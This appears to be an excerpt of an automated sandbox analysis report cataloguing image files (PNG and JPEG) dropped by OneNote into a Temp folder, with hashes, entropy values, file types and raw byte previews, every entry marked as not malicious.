                                                                                                                                            Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{5B840DB4-D8F1-4835-AF6B-E86456BA9F7A}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14458
                                                                                                                                            Entropy (8bit):7.944094738048628
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                            MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                            SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                            SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                            SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{5BD27281-8EB8-418B-B337-536F3B6EA3A6}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11332
                                                                                                                                            Entropy (8bit):7.9324721568775285
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                            MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                            SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                            SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                            SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{5D550771-95F2-4B96-BC1E-2BB5C10C6E1C}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):129887
                                                                                                                                            Entropy (8bit):7.8877849553452695
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
                                                                                                                                            MD5:737E96E41D79D3BDACE7AB4F8CBF6274
                                                                                                                                            SHA1:E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
                                                                                                                                            SHA-256:7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
                                                                                                                                            SHA-512:D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....iExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:..*....a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{5E12BA23-48FE-462A-BCD6-C9D04E43F822}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):29187
                                                                                                                                            Entropy (8bit):7.971308326749753
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
                                                                                                                                            MD5:DF99CAAAB9A7DE97B63343E60A699AB6
                                                                                                                                            SHA1:B84334135CFB73BC6EF55F85926770D5AC6DFEA8
                                                                                                                                            SHA-256:74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
                                                                                                                                            SHA-512:5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;*.'.f.5^.....m..<$....8.R.j.D.v..>...*dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%.*.S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..|D...+...NA....Y.^f.1|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N.....*.U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{5E1E7202-43AB-4B05-8B19-CECD7F04DE35}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):47294
                                                                                                                                            Entropy (8bit):7.497888607667405
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
                                                                                                                                            MD5:7A450E086AD14BA7D89BA5DB3D3AE6C7
                                                                                                                                            SHA1:E7AEAFCFCE476390E18C19456BDF6529D863D518
                                                                                                                                            SHA-256:BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
                                                                                                                                            SHA-512:9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1|....[...jQ.%Zb.......t..........*..V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=*N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{600ED48D-F6EA-4C64-B0C1-CD5C2E87C6C8}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13084
                                                                                                                                            Entropy (8bit):7.940058639272698
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                            MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                            SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                            SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                            SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{602E4507-116A-458B-883C-9799CFDE4597}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 39 x 600, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2104
                                                                                                                                            Entropy (8bit):7.252780160030615
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
                                                                                                                                            MD5:F6C596F505504044DF1E36BA5DA3F09B
                                                                                                                                            SHA1:BCF17EC408899B822492B47E307DE638CC792447
                                                                                                                                            SHA-256:EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
                                                                                                                                            SHA-512:E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{603758AD-6FA7-4167-88CE-C042BED324F3}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11449
                                                                                                                                            Entropy (8bit):7.91552812501629
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                            MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                            SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                            SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                            SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{61AA900A-34A6-4D96-8D22-2545944E7ECE}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):55804
                                                                                                                                            Entropy (8bit):7.433623355028275
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                                                            MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                                                            SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                                                            SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                                                            SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{621C1491-19AC-41E5-B43D-78BF5F051FE9}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19235
                                                                                                                                            Entropy (8bit):7.944867159042578
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                            MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                            SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                            SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                            SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{66F8B0EF-F959-4503-B926-C76D6BEEA4D6}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1924
                                                                                                                                            Entropy (8bit):7.836744258175623
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                            MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                            SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                            SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                            SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{675FC58E-63FE-4C06-94B0-5075D3EE0B22}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40035
                                                                                                                                            Entropy (8bit):7.360144465307449
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
                                                                                                                                            MD5:B1DDD365D87605F96D72042CB56572F6
                                                                                                                                            SHA1:ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
                                                                                                                                            SHA-256:06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
                                                                                                                                            SHA-512:9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R*.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$.*.r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<|..1/.|.....b..-..y....]U#Ctn.7m.._.|..2I;|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{681AFF76-9F64-4BD9-94B6-292DDB4B344D}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8184
                                                                                                                                            Entropy (8bit):7.807848176906598
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                            MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                            SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                            SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                            SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                            Malicious:false
